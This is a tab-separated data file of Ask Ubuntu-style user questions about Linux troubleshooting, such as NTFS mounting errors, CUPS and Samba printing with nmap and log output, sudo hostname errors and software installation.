319240	ca n't open windows , and i get this error message when i try to access the partition from ubuntu	error mounting /dev/sda5 at /media/rafi/windows8_os : command-line `mount -t `` ntfs '' -o `` uhelper=udisks2 , nodev , nosuid , uid=1000 , gid=1000 , dmask=0077 , fmask=0177 '' `` /dev/sda5 '' `` /media/rafi/windows8_os '' ' exited with non-zero exit status 14 : the disk contains an unclean file system ( 0 , 0 ) . metadata kept in windows cache , refused to mount . failed to mount '/dev/sda5 ' : operation not permitted the ntfs partition is in an unsafe state . please resume and shutdown windows fully ( no hibernation or fast restarting ) , or mount the volume read-only with the 'ro ' mount option . i 've tried running boot-repair a few times now . windows refuses to open , even when i give that command in the bios . all i really want is to retrieve the files - i 'm happy to wipe windows off my machine . thanks a lot .
319241	jdk installation error	sudo apt-get install oracle-java6-installer [ sudo ] password for taha : reading package lists ... done building dependency tree reading state information ... done suggested packages : binfmt-support visualvm ttf-baekmuk ttf-unfonts ttf-unfonts-core ttf-kochi-gothic ttf-sazanami-gothic ttf-kochi-mincho ttf-sazanami-mincho ttf-arphic-uming the following new packages will be installed : oracle-java6-installer 0 upgraded , 1 newly installed , 0 to remove and 291 not upgraded . 1 not fully installed or removed . need to get 0 b/17.2 kb of archives . after this operation , 106 kb of additional disk space will be used . preconfiguring packages ... ( reading database ... 143904 files and directories currently installed . ) unpacking oracle-java6-installer ( from ... /oracle-java6-installer_6u37-0~eugenesan~precise1_all.deb ) ... oracle-license-v1-1 license has already been accepted dpkg : error processing /var/cache/apt/archives/oracle-java6-installer_6u37-0~eugenesan~precise1_all.deb ( -- unpack ) : trying to overwrite '/usr/share/applications/jb-java.desktop ' , which is also in package oracle-java7-installer 7u3-0~eugenesan~precise4 processing triggers for desktop-file-utils ... processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... processing triggers for gnome-menus ... errors were encountered while processing : /var/cache/apt/archives/oracle-java6-installer_6u37-0~eugenesan~precise1_all.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 )
319244	ca n't print through business printer	i am having problems printing to the printer connected to my ( sbs2003 ) business 's network . the printer is a sharp mx-m314n . all windows computers on the network can print to it fine , just my ubuntu machine that wo n't . i know the ip of the printer and i can ping it and even print files from it by going to 192.168.0.50 in firefox and uploading a file . if i do an nmap on the ip of the printer and the server i get this : jamesmaddison @ development : ~ $ nmap 192.168.0.50 starting nmap 5.21 ( http : //nmap.org ) at 2013-07-11 16:12 bst nmap scan report for 192.168.0.50 host is up ( 0.46s latency ) . not shown : 991 closed ports port state service 21/tcp open ftp 23/tcp open telnet 80/tcp open http 443/tcp open https 515/tcp open printer 631/tcp open ipp 5900/tcp open vnc 9100/tcp open jetdirect 50001/tcp open unknown nmap done : 1 ip address ( 1 host up ) scanned in 4.55 seconds jamesmaddison @ development : ~ $ nmap mastermagnets starting nmap 5.21 ( http : //nmap.org ) at 2013-07-11 16:35 bst nmap scan report for mastermagnets ( 192.168.0.2 ) host is up ( 0.00055s latency ) . rdns record for 192.168.0.2 : mastermagnets.local not shown : 957 closed ports port state service 25/tcp open smtp 42/tcp open nameserver 53/tcp open domain 80/tcp open http 88/tcp open kerberos-sec 135/tcp open msrpc 139/tcp open netbios-ssn 389/tcp open ldap 443/tcp open https 444/tcp open snpp 445/tcp open microsoft-ds 464/tcp open kpasswd5 593/tcp open http-rpc-epmap 636/tcp open ldapssl 691/tcp open resvc 1025/tcp open nfs-or-iis 1027/tcp open iis 1042/tcp open unknown 1045/tcp open unknown 1046/tcp open unknown 1048/tcp open unknown 1049/tcp open unknown 1054/tcp open unknown 1081/tcp open unknown 1087/tcp open unknown 1094/tcp open unknown 1104/tcp open unknown 2301/tcp open compaqdiag 2381/tcp open unknown 3268/tcp open globalcatldap 3269/tcp open globalcatldapssl 3389/tcp open ms-term-serv 5633/tcp open unknown 6001/tcp open x11:1 6002/tcp open x11:2 6004/tcp open x11:4 6101/tcp open backupexec 6106/tcp open isdninfo 8080/tcp open http-proxy 8081/tcp open blackice-icecap 8082/tcp open blackice-alerts 8443/tcp open https-alt 10000/tcp open snet-sensor-mgmt nmap done : 1 ip address ( 1 host up ) scanned in 1.18 seconds and when i do a 'smbclient ' i get the following : ~ $ smbclient -u mastermagnets/jamesmaddison -l //sbssrv sharename type comment -- -- -- -- - -- -- -- -- -- - line100 disk print $ disk printer drivers c $ disk default share s $ disk default share technical disk irs disk designjet 500-24 printer hp designjet 500 24 by hp accounts disk ricoh printer ricoh aficio 1027 clients disk windows small business server client setup tsclient disk ipc $ ipc remote ipc resources $ disk `` event logging files '' fxssrvcp $ disk common fax cover pages folder tsweb disk sharp mx-m314n printer 192.168.0.50 admin $ disk remote admin faxclient disk microsoft shared fax clients clientapps disk windows small business server client applications dloagent disk symantec dlo share magnets-database files disk magnet-database files disk d $ disk default share users disk users shared folders public disk actsql disk sysvol disk logon server share address disk `` access to address objects '' confidential disk netlogon disk logon server share sbssrv.log disk exchange message tracking logs server comment -- -- -- -- - -- -- -- - andy design1 design2 design3 development development server ( samba , linux ) frank joe jonathan kim kim orderprint purchase order printer phil sbssrv termsrv workgroup master -- -- -- -- - -- -- -- - mastermagnets sbssrv i have tried the following protocols in cups : smb : //mastermagnets/sbssrv/sharp % 20mx-m314n/ smb : //jamesmaddison : password @ mastermagnets/sbssrv/sharp % 20mx-m314n/ socket : //192.168.0.50:9100 ipp : //192.168.0.50/ipp ? version=1.0 lpd : //192.168.0.50/lp and all of the `` discovered printers '' that cups lists . ( they 're dnssd protocols ) i have also tried adding the printer through lpadmin : jamesmaddison @ development : ~ $ lpadmin -p sharpprinter -v smb : //jamesmaddison : password @ mastermagnets/sbssrv/sharp % 20mx-m314n/ -p /usr/share/cups/model/sharp/en/sharp_mx-m314n.ppd smbstatus always reports no processes ( i just get table headers ) . i do n't know if that 's important but it seems suspicious to me . the [ printers ] section of my smb.conf is pretty much the default : [ printers ] comment = all printers browseable = no path = /var/spool/samba printable = yes guest ok = yes read only = yes create mask = 0700 here 's what the cups error log says for the last job i tried . d [ 15/jul/2013:09:11:12 +0100 ] cupsdacceptclient : 17 from localhost ( domain ) d [ 15/jul/2013:09:11:12 +0100 ] cupsdreadclient : 17 post / http/1.1 d [ 15/jul/2013:09:11:12 +0100 ] cupsdsetbusystate : newbusy= '' active clients '' , busy= '' not busy '' d [ 15/jul/2013:09:11:12 +0100 ] cupsdauthorize : no authentication data provided . d [ 15/jul/2013:09:11:12 +0100 ] cupsdreadclient : 17 1.1 cups-get-default 1 d [ 15/jul/2013:09:11:12 +0100 ] cups-get-default d [ 15/jul/2013:09:11:12 +0100 ] returning ipp successful-ok for cups-get-default ( no uri ) from localhost d [ 15/jul/2013:09:11:12 +0100 ] cupsdsetbusystate : newbusy= '' not busy '' , busy= '' active clients '' d [ 15/jul/2013:09:11:12 +0100 ] cupsdreadclient : 17 post /printers/sharp_mx-m314n http/1.1 d [ 15/jul/2013:09:11:12 +0100 ] cupsdsetbusystate : newbusy= '' active clients '' , busy= '' not busy '' d [ 15/jul/2013:09:11:12 +0100 ] cupsdauthorize : no authentication data provided . d [ 15/jul/2013:09:11:12 +0100 ] cupsdreadclient : 17 1.1 create-job 1 d [ 15/jul/2013:09:11:12 +0100 ] create-job ipp : //localhost:631/printers/sharp_mx-m314n d [ 15/jul/2013:09:11:12 +0100 ] cupsdmarkdirty ( -- -- j- ) d [ 15/jul/2013:09:11:12 +0100 ] cupsdsetbusystate : newbusy= '' active clients and dirty files '' , busy= '' active clients '' d [ 15/jul/2013:09:11:12 +0100 ] add_job : requesting-user-name= '' root '' i [ 15/jul/2013:09:11:12 +0100 ] [ job 67 ] adding start banner page `` none '' . d [ 15/jul/2013:09:11:12 +0100 ] notifier dbus started - pid = 4290 d [ 15/jul/2013:09:11:12 +0100 ] cupsdmarkdirty ( -- -- -s ) d [ 15/jul/2013:09:11:12 +0100 ] cupsdsetbusystate : newbusy= '' active clients and dirty files '' , busy= '' active clients and dirty files '' i [ 15/jul/2013:09:11:12 +0100 ] [ job 67 ] queued on `` sharp_mx-m314n '' by `` root '' . d [ 15/jul/2013:09:11:12 +0100 ] returning ipp successful-ok for create-job ( ipp : //localhost:631/printers/sharp_mx-m314n ) from localhost d [ 15/jul/2013:09:11:12 +0100 ] [ notifier ] state=3 d [ 15/jul/2013:09:11:12 +0100 ] cupsdsetbusystate : newbusy= '' dirty files '' , busy= '' active clients and dirty files '' d [ 15/jul/2013:09:11:12 +0100 ] cupsdreadclient : 17 post /printers/sharp_mx-m314n http/1.1 d [ 15/jul/2013:09:11:12 +0100 ] cupsdsetbusystate : newbusy= '' active clients and dirty files '' , busy= '' dirty files '' d [ 15/jul/2013:09:11:12 +0100 ] cupsdauthorize : no authentication data provided . d [ 15/jul/2013:09:11:12 +0100 ] cupsdreadclient : 17 1.1 send-document 1 d [ 15/jul/2013:09:11:12 +0100 ] send-document ipp : //localhost:631/printers/sharp_mx-m314n d [ 15/jul/2013:09:11:12 +0100 ] cupsdisauthorized : requesting-user-name= '' root '' d [ 15/jul/2013:09:11:12 +0100 ] [ job 67 ] auto-typing file ... d [ 15/jul/2013:09:11:12 +0100 ] [ job 67 ] request file type is text/plain . d [ 15/jul/2013:09:11:12 +0100 ] cupsdmarkdirty ( -- -- j- ) d [ 15/jul/2013:09:11:12 +0100 ] cupsdsetbusystate : newbusy= '' active clients and dirty files '' , busy= '' active clients and dirty files '' i [ 15/jul/2013:09:11:12 +0100 ] [ job 67 ] file of type text/plain queued by `` root '' . i [ 15/jul/2013:09:11:12 +0100 ] [ job 67 ] adding end banner page `` none '' . d [ 15/jul/2013:09:11:12 +0100 ] cupsdmarkdirty ( -- -- j- ) d [ 15/jul/2013:09:11:12 +0100 ] cupsdsetbusystate : newbusy= '' active clients and dirty files '' , busy= '' active clients and dirty files '' d [ 15/jul/2013:09:11:12 +0100 ] cupsdmarkdirty ( -- -- j- ) d [ 15/jul/2013:09:11:12 +0100 ] cupsdsetbusystate : newbusy= '' active clients and dirty files '' , busy= '' active clients and dirty files '' d [ 15/jul/2013:09:11:12 +0100 ] cupsdsetbusystate : newbusy= '' active clients and dirty files '' , busy= '' active clients and dirty files '' d [ 15/jul/2013:09:11:12 +0100 ] cupsdmarkdirty ( -- -- -s ) d [ 15/jul/2013:09:11:12 +0100 ] cupsdsetbusystate : newbusy= '' active clients and dirty files '' , busy= '' active clients and dirty files '' d [ 15/jul/2013:09:11:12 +0100 ] [ job 67 ] job-sheets=none , none d [ 15/jul/2013:09:11:12 +0100 ] [ job 67 ] argv [ 0 ] = '' sharp_mx-m314n '' d [ 15/jul/2013:09:11:12 +0100 ] [ job 67 ] argv [ 1 ] = '' 67 '' d [ 15/jul/2013:09:11:12 +0100 ] [ job 67 ] argv [ 2 ] = '' root '' d [ 15/jul/2013:09:11:12 +0100 ] [ job 67 ] argv [ 3 ] = '' test.txt '' d [ 15/jul/2013:09:11:12 +0100 ] [ job 67 ] argv [ 4 ] = '' 1 '' d [ 15/jul/2013:09:11:12 +0100 ] [ job 67 ] argv [ 5 ] = '' finishings=3 number-up=1 job-uuid=urn : uuid : c5ced1ef-681f-39c9-6851-d89d94bae8c9 job-originating-host-name=localhost time-at-creation=1373875872 time-at-processing=1373875872 '' d [ 15/jul/2013:09:11:12 +0100 ] [ job 67 ] argv [ 6 ] = '' /var/spool/cups/d00067-001 '' d [ 15/jul/2013:09:11:12 +0100 ] [ job 67 ] envp [ 0 ] = '' cups_cachedir=/var/cache/cups '' d [ 15/jul/2013:09:11:12 +0100 ] [ job 67 ] envp [ 1 ] = '' cups_datadir=/usr/share/cups '' d [ 15/jul/2013:09:11:12 +0100 ] [ job 67 ] envp [ 2 ] = '' cups_docroot=/usr/share/cups/doc-root '' d [ 15/jul/2013:09:11:12 +0100 ] [ job 67 ] envp [ 3 ] = '' cups_fontpath=/usr/share/cups/fonts '' d [ 15/jul/2013:09:11:12 +0100 ] [ job 67 ] envp [ 4 ] = '' cups_requestroot=/var/spool/cups '' d [ 15/jul/2013:09:11:12 +0100 ] [ job 67 ] envp [ 5 ] = '' cups_serverbin=/usr/lib/cups '' d [ 15/jul/2013:09:11:12 +0100 ] [ job 67 ] envp [ 6 ] = '' cups_serverroot=/etc/cups '' d [ 15/jul/2013:09:11:12 +0100 ] [ job 67 ] envp [ 7 ] = '' cups_statedir=/var/run/cups '' d [ 15/jul/2013:09:11:12 +0100 ] [ job 67 ] envp [ 8 ] = '' home=/var/spool/cups/tmp '' d [ 15/jul/2013:09:11:12 +0100 ] [ job 67 ] envp [ 9 ] = '' path=/usr/lib/cups/filter : /usr/bin : /usr/sbin : /bin : /usr/bin '' d [ 15/jul/2013:09:11:12 +0100 ] [ job 67 ] envp [ 10 ] = '' server_admin=root @ development '' d [ 15/jul/2013:09:11:12 +0100 ] [ job 67 ] envp [ 11 ] = '' software=cups/1.5.3 '' d [ 15/jul/2013:09:11:12 +0100 ] [ job 67 ] envp [ 12 ] = '' tmpdir=/var/spool/cups/tmp '' d [ 15/jul/2013:09:11:12 +0100 ] [ job 67 ] envp [ 13 ] = '' user=root '' d [ 15/jul/2013:09:11:12 +0100 ] [ job 67 ] envp [ 14 ] = '' cups_server=/var/run/cups/cups.sock '' d [ 15/jul/2013:09:11:12 +0100 ] [ job 67 ] envp [ 15 ] = '' cups_encryption=ifrequested '' d [ 15/jul/2013:09:11:12 +0100 ] [ job 67 ] envp [ 16 ] = '' ipp_port=631 '' d [ 15/jul/2013:09:11:12 +0100 ] [ job 67 ] envp [ 17 ] = '' charset=utf-8 '' d [ 15/jul/2013:09:11:12 +0100 ] [ job 67 ] envp [ 18 ] = '' lang=en_gb.utf-8 '' d [ 15/jul/2013:09:11:12 +0100 ] [ job 67 ] envp [ 19 ] = '' ppd=/etc/cups/ppd/sharp_mx-m314n.ppd '' d [ 15/jul/2013:09:11:12 +0100 ] [ job 67 ] envp [ 20 ] = '' rip_max_cache=128m '' d [ 15/jul/2013:09:11:12 +0100 ] [ job 67 ] envp [ 21 ] = '' content_type=text/plain '' d [ 15/jul/2013:09:11:12 +0100 ] [ job 67 ] envp [ 22 ] = '' device_uri=smb : //sbssrv/sharp % 20mx-m314n '' d [ 15/jul/2013:09:11:12 +0100 ] [ job 67 ] envp [ 23 ] = '' printer_info=sharp_mx-m314n '' d [ 15/jul/2013:09:11:12 +0100 ] [ job 67 ] envp [ 24 ] = '' printer_location= '' d [ 15/jul/2013:09:11:12 +0100 ] [ job 67 ] envp [ 25 ] = '' printer=sharp_mx-m314n '' d [ 15/jul/2013:09:11:12 +0100 ] [ job 67 ] envp [ 26 ] = '' printer_state_reasons=none '' d [ 15/jul/2013:09:11:12 +0100 ] [ job 67 ] envp [ 27 ] = '' cups_filetype=document '' d [ 15/jul/2013:09:11:12 +0100 ] [ job 67 ] envp [ 28 ] = '' final_content_type=application/vnd.cups-postscript '' d [ 15/jul/2013:09:11:12 +0100 ] [ job 67 ] envp [ 29 ] = '' auth_i**** '' i [ 15/jul/2013:09:11:12 +0100 ] [ job 67 ] started filter /usr/lib/cups/filter/texttopdf ( pid 4291 ) i [ 15/jul/2013:09:11:12 +0100 ] [ job 67 ] started filter /usr/lib/cups/filter/pdftopdf ( pid 4292 ) i [ 15/jul/2013:09:11:12 +0100 ] [ job 67 ] started filter /usr/lib/cups/filter/pdftops ( pid 4293 ) i [ 15/jul/2013:09:11:12 +0100 ] [ job 67 ] started backend /usr/lib/cups/backend/smb ( pid 4294 ) d [ 15/jul/2013:09:11:12 +0100 ] cupsdmarkdirty ( -- -- -s ) d [ 15/jul/2013:09:11:12 +0100 ] cupsdsetbusystate : newbusy= '' active clients , printing jobs , and dirty files '' , busy= '' active clients and dirty files '' d [ 15/jul/2013:09:11:12 +0100 ] returning ipp successful-ok for send-document ( ipp : //localhost:631/printers/sharp_mx-m314n ) from localhost d [ 15/jul/2013:09:11:12 +0100 ] [ notifier ] state=3 d [ 15/jul/2013:09:11:12 +0100 ] [ notifier ] state=3 d [ 15/jul/2013:09:11:12 +0100 ] [ notifier ] connected to d-bus d [ 15/jul/2013:09:11:12 +0100 ] [ notifier ] state=3 d [ 15/jul/2013:09:11:12 +0100 ] [ notifier ] state=3 d [ 15/jul/2013:09:11:12 +0100 ] [ notifier ] state=3 d [ 15/jul/2013:09:11:12 +0100 ] cupsdsetbusystate : newbusy= '' printing jobs and dirty files '' , busy= '' active clients , printing jobs , and dirty files '' d [ 15/jul/2013:09:11:12 +0100 ] cupsdreadclient : 17 waiting closing on eof d [ 15/jul/2013:09:11:12 +0100 ] cupsdcloseclient : 17 d [ 15/jul/2013:09:11:12 +0100 ] cupsdsetbusystate : newbusy= '' printing jobs and dirty files '' , busy= '' printing jobs and dirty files '' d [ 15/jul/2013:09:11:12 +0100 ] [ job 67 ] pdftops - copying to temp print file `` /tmp/010c551e5ab02 '' d [ 15/jul/2013:09:11:12 +0100 ] [ job 67 ] page = 595x842 ; 12,12 to 583,830 d [ 15/jul/2013:09:11:12 +0100 ] [ job 67 ] connected with username/password ... d [ 15/jul/2013:09:11:12 +0100 ] pid 4291 ( /usr/lib/cups/filter/texttopdf ) exited with no errors . d [ 15/jul/2013:09:11:12 +0100 ] pid 4292 ( /usr/lib/cups/filter/pdftopdf ) exited with no errors . d [ 15/jul/2013:09:11:12 +0100 ] [ job 67 ] using image rendering resolution 300 dpi d [ 15/jul/2013:09:11:12 +0100 ] [ job 67 ] started filter pdftops ( pid 4295 ) d [ 15/jul/2013:09:11:12 +0100 ] [ job 67 ] started filter pstops ( pid 4296 ) d [ 15/jul/2013:09:11:12 +0100 ] [ job 67 ] page = 595x842 ; 12,12 to 583,830 d [ 15/jul/2013:09:11:12 +0100 ] [ job 67 ] slow_collate=0 , slow_duplex=0 , slow_order=0 d [ 15/jul/2013:09:11:12 +0100 ] [ job 67 ] before copy_comments - % ! ps-adobe-3.0 d [ 15/jul/2013:09:11:12 +0100 ] [ job 67 ] % ! ps-adobe-3.0 d [ 15/jul/2013:09:11:12 +0100 ] [ job 67 ] % produced by poppler pdftops version : 0.18.4 ( http : //poppler.freedesktop.org ) d [ 15/jul/2013:09:11:12 +0100 ] [ job 67 ] % % languagelevel : 2 d [ 15/jul/2013:09:11:12 +0100 ] [ job 67 ] % % documentsuppliedresources : ( atend ) d [ 15/jul/2013:09:11:12 +0100 ] [ job 67 ] % % documentmedia : plain 595 842 0 ( ) ( ) d [ 15/jul/2013:09:11:12 +0100 ] [ job 67 ] % % boundingbox : 0 0 595 842 d [ 15/jul/2013:09:11:12 +0100 ] [ job 67 ] % % pages : 1 d [ 15/jul/2013:09:11:12 +0100 ] [ job 67 ] % % endcomments d [ 15/jul/2013:09:11:12 +0100 ] [ job 67 ] before copy_prolog - % % begindefaults d [ 15/jul/2013:09:11:12 +0100 ] [ job 67 ] before copy_setup - % % beginsetup d [ 15/jul/2013:09:11:12 +0100 ] [ job 67 ] pid 4295 ( pdftops ) exited with no errors . d [ 15/jul/2013:09:11:12 +0100 ] [ job 67 ] before page loop - % % page : 1 1 d [ 15/jul/2013:09:11:12 +0100 ] [ job 67 ] copying page 1 ... d [ 15/jul/2013:09:11:12 +0100 ] [ job 67 ] page : 1 1 d [ 15/jul/2013:09:11:12 +0100 ] cupsdmarkdirty ( -- -- -s ) d [ 15/jul/2013:09:11:12 +0100 ] cupsdsetbusystate : newbusy= '' printing jobs and dirty files '' , busy= '' printing jobs and dirty files '' d [ 15/jul/2013:09:11:12 +0100 ] [ job 67 ] pagew = 571.0 , pagel = 818.0 d [ 15/jul/2013:09:11:12 +0100 ] [ job 67 ] bboxx = 0 , bboxy = 0 , bboxw = 595 , bboxl = 842 d [ 15/jul/2013:09:11:12 +0100 ] [ job 67 ] pageleft = 12.0 , pageright = 583.0 d [ 15/jul/2013:09:11:12 +0100 ] [ job 67 ] pagetop = 830.0 , pagebottom = 12.0 d [ 15/jul/2013:09:11:12 +0100 ] [ job 67 ] pagewidth = 595.0 , pagelength = 842.0 d [ 15/jul/2013:09:11:12 +0100 ] [ notifier ] state=3 d [ 15/jul/2013:09:11:12 +0100 ] [ job 67 ] wrote 1 pages ... d [ 15/jul/2013:09:11:12 +0100 ] [ job 67 ] pid 4296 ( pstops ) exited with no errors . d [ 15/jul/2013:09:11:12 +0100 ] pid 4293 ( /usr/lib/cups/filter/pdftops ) exited with no errors . d [ 15/jul/2013:09:11:12 +0100 ] pid 4294 ( /usr/lib/cups/backend/smb ) exited with no errors . d [ 15/jul/2013:09:11:12 +0100 ] cupsdmarkdirty ( -- -- -s ) d [ 15/jul/2013:09:11:12 +0100 ] cupsdsetbusystate : newbusy= '' printing jobs and dirty files '' , busy= '' printing jobs and dirty files '' i [ 15/jul/2013:09:11:12 +0100 ] [ job 67 ] job completed . d [ 15/jul/2013:09:11:12 +0100 ] cupsdmarkdirty ( -- -- j- ) d [ 15/jul/2013:09:11:12 +0100 ] cupsdsetbusystate : newbusy= '' printing jobs and dirty files '' , busy= '' printing jobs and dirty files '' d [ 15/jul/2013:09:11:12 +0100 ] cupsdsetbusystate : newbusy= '' printing jobs and dirty files '' , busy= '' printing jobs and dirty files '' d [ 15/jul/2013:09:11:12 +0100 ] cupsdmarkdirty ( -- -- -s ) d [ 15/jul/2013:09:11:12 +0100 ] cupsdsetbusystate : newbusy= '' printing jobs and dirty files '' , busy= '' printing jobs and dirty files '' d [ 15/jul/2013:09:11:12 +0100 ] [ notifier ] state=3 d [ 15/jul/2013:09:11:12 +0100 ] [ notifier ] state=3 d [ 15/jul/2013:09:11:12 +0100 ] [ notifier ] state=3 d [ 15/jul/2013:09:11:12 +0100 ] [ notifier ] state=3 d [ 15/jul/2013:09:11:12 +0100 ] cupsdacceptclient : 17 from localhost ( domain ) d [ 15/jul/2013:09:11:12 +0100 ] cupsdreadclient : 17 post / http/1.1 d [ 15/jul/2013:09:11:12 +0100 ] cupsdsetbusystate : newbusy= '' active clients and dirty files '' , busy= '' printing jobs and dirty files '' d [ 15/jul/2013:09:11:12 +0100 ] cupsdauthorize : no authentication data provided . d [ 15/jul/2013:09:11:12 +0100 ] cupsdreadclient : 17 1.1 get-notifications 1 d [ 15/jul/2013:09:11:12 +0100 ] get-notifications / d [ 15/jul/2013:09:11:12 +0100 ] cupsdisauthorized : requesting-user-name= '' jamesmaddison '' d [ 15/jul/2013:09:11:12 +0100 ] returning ipp successful-ok for get-notifications ( / ) from localhost d [ 15/jul/2013:09:11:12 +0100 ] cupsdsetbusystate : newbusy= '' dirty files '' , busy= '' active clients and dirty files '' d [ 15/jul/2013:09:11:12 +0100 ] cupsdreadclient : 17 waiting closing on eof d [ 15/jul/2013:09:11:12 +0100 ] cupsdcloseclient : 17 d [ 15/jul/2013:09:11:12 +0100 ] cupsdsetbusystate : newbusy= '' dirty files '' , busy= '' dirty files '' d [ 15/jul/2013:09:11:12 +0100 ] cupsdacceptclient : 17 from localhost ( domain ) d [ 15/jul/2013:09:11:12 +0100 ] cupsdreadclient : 17 post / http/1.1 d [ 15/jul/2013:09:11:12 +0100 ] cupsdsetbusystate : newbusy= '' active clients and dirty files '' , busy= '' dirty files '' d [ 15/jul/2013:09:11:12 +0100 ] cupsdauthorize : no authentication data provided . d [ 15/jul/2013:09:11:12 +0100 ] cupsdreadclient : 17 1.1 cups-get-printers 1 d [ 15/jul/2013:09:11:12 +0100 ] cups-get-printers d [ 15/jul/2013:09:11:12 +0100 ] returning ipp successful-ok for cups-get-printers ( no uri ) from localhost d [ 15/jul/2013:09:11:12 +0100 ] cupsdsetbusystate : newbusy= '' dirty files '' , busy= '' active clients and dirty files '' d [ 15/jul/2013:09:11:12 +0100 ] cupsdreadclient : 17 post / http/1.1 d [ 15/jul/2013:09:11:12 +0100 ] cupsdsetbusystate : newbusy= '' active clients and dirty files '' , busy= '' dirty files '' d [ 15/jul/2013:09:11:12 +0100 ] cupsdauthorize : no authentication data provided . d [ 15/jul/2013:09:11:12 +0100 ] cupsdreadclient : 17 1.1 cups-get-classes 1 d [ 15/jul/2013:09:11:12 +0100 ] cups-get-classes d [ 15/jul/2013:09:11:12 +0100 ] returning ipp successful-ok for cups-get-classes ( no uri ) from localhost d [ 15/jul/2013:09:11:12 +0100 ] cupsdsetbusystate : newbusy= '' dirty files '' , busy= '' active clients and dirty files '' d [ 15/jul/2013:09:11:12 +0100 ] cupsdreadclient : 17 post / http/1.1 d [ 15/jul/2013:09:11:12 +0100 ] cupsdsetbusystate : newbusy= '' active clients and dirty files '' , busy= '' dirty files '' d [ 15/jul/2013:09:11:12 +0100 ] cupsdauthorize : no authentication data provided . d [ 15/jul/2013:09:11:12 +0100 ] cupsdreadclient : 17 1.1 cups-get-default 1 d [ 15/jul/2013:09:11:12 +0100 ] cups-get-default d [ 15/jul/2013:09:11:12 +0100 ] returning ipp successful-ok for cups-get-default ( no uri ) from localhost d [ 15/jul/2013:09:11:12 +0100 ] cupsdsetbusystate : newbusy= '' dirty files '' , busy= '' active clients and dirty files '' d [ 15/jul/2013:09:11:13 +0100 ] [ job 67 ] unloading ... here 's the result of snmp with cups_debug_level=2 http : //pastebin.com/carhta9q and i often get a notification saying `` printer error : printer error printer name : connecting-to-device '' i just ca n't get it to work , the problem seems to be between cups and the windows server as if i go to 192.168.0.50:9100 in firefox the printer prints the get header it receives . i can also go to 192.168.0.50 and upload a file directly to the printer . lastly i can ftp into the printer and upload files that way . as requested lpstat -d and lpstat -t jamesmaddison @ development : ~ $ lpstat -d system default destination : sharp-mx-m314n jamesmaddison @ development : ~ $ lpstat -t scheduler is running system default destination : sharp-mx-m314n device for sharp-mx-m314n : smb : //mastermagnets/sbssrv/sharp % 20mx-m314n sharp-mx-m314n accepting requests since mon 15 jul 2013 13:30:20 bst printer sharp-mx-m314n is idle . enabled since mon 15 jul 2013 13:30:20 bst
319246	iocean x7 ubuntu touch	i want buy this phone iocean x7 , specifications includes : cpu : mtk6589 quad core cortex a9 ram : 1gb do you think i can install ubuntu touch on this device ? i do n't want know if evreything will works fine , but only if i will be able to install the os on this device thank you
319250	does anyone know about avconv scripts ?	i want an avconv script which automatically scans some of my directories and then checks for .avi files and then converts them to .mp4 and then deletes the .avi files when finished . i am not a bash programmer so i do n't know how bash operates so i ca n't give an example because i do n't know if that 's what i need .
319253	bad sound on headphones if i do n't press mic button	i 've just buyed this headphones : http : //www.amazon.com/sennheiser-hd-429-headphones-smartphones/dp/b009hqtors they have a mic button so you can talk when attached to a mobile . if i use the headphones in a mobile ( i 've just tested samsung s3 and s1 ) it works like a charm . but if i use them in my sony laptop with ubuntu , sound quality is really bad . if the player is flash , sound is not good . if it is not , sound is just horrible . but if i press mic button , sound is perfect ! ! what can i do ?
319258	upstart does n't produce any log on ubuntu raring	i 've just installed ubuntu 13.04 and added custom upstart scripts . these scripts work well and are already in use on other hosts ( not ubuntu ) . the problem is , upstart does n't produce any log of what it does . the only logs are daemon output logs in /var/log/upstart/ . when jobs are started or stopped , no log are created . when a job is killed or exits 1 , it is respawned , but there is no log of the respawn event in /var/log/* . log-priority is message , but setting it to debug does n't change anything . how can i have upstart produce logs of what is does on raring ? thanks for your help . arthur
319260	how do i bookmark sections in a pdf file converted from libre office ?	i have an .odt document i have converted to .pdf , with many different sections , subsections , subsubsections , etc.. in the pdf i want to create a nice bookmark table to easily navigate the document . the good part is the sections i need bookmarked are either bolded or italized which is different from all text of the document . presently i 'm bookmarking one by one which will take a number of hours but i have no idea where to look for a program to do this task or how to start with scripting this . even a program on windows would help - i guessing it 's against the rules to mention windows , but by some off-chance something like this exists it would save me hours . i 'm assuming it does n't and the only way would have to be by way of a script into a pipe . so if anyone knows how to go about this it would be most appreciated .
319265	changed hostname , closed before changing hosts , now sudo is broken , catch-22 !	i 'm using lubuntu 12.04 . i was trying to change my computer name to `` main '' and i messed up , i 'm not sure what to do now . i was following the directions on this page . here 's what i did : sudo leafpad /etc/hostname i changed the name , then stupidly closed the file , before changing `` /etc/hosts '' now when i try to move on to the next step ( sudo leafpad /etc/hosts ) , or try any command that begins with `` sudo '' i get this error : sudo : unable to resolve host main no protocol specified no protocol specified i can see that the problem is that i 've changed the hostname , so the computer 's bewildered by my efforts to use sudo because now hostname and hosts do n't match . all i need to do is change the name in hosts , but of course i ca n't do that without sudo . any ideas ?
319269	how do i install obapps in lubuntu 13.04 ?	obapps is a graphical tool for configuring per-application settings in openbox . while it 's possible to make per-application settings by editing lubuntu-rc.xml as described here , a gui approach may be preferable . unfortunately , obapps is n't available in ubuntu 's repos but is available as a .tar.gz from here . extracting this tar yields three python scripts and a readme . to quote from the readme : to install : sudo python setup.py install , or just put obapps somewhere on your path and make sure it 's executable requires : wxpython ( 2.8.0+ ) , python-xlib but apt-cache search wxpython or apt-cache search wxpython does n't list a package of that name . does that mean i can not install obapps ?
319270	can i install ubuntu server via a usb stick ?	can i install ubuntu server from usb sticks ? i do n't want to plug a dvd player into the server .
319278	how to mount extended partition in ubuntu for all users	sir , i am a new user of ubuntu 12.04 . i faced a problem , my ubuntu 12.04 has two user one is administrator and another is sudo user . i have 3 partition one ubuntu file system and rest two partition is ntfs partition . when i mount these partition as a administrator then the sudo user ca n't see those partitions , if i mount these partition as a sudo user then the administrator ca n't see those partitions . please help me and guide to solve this problem .
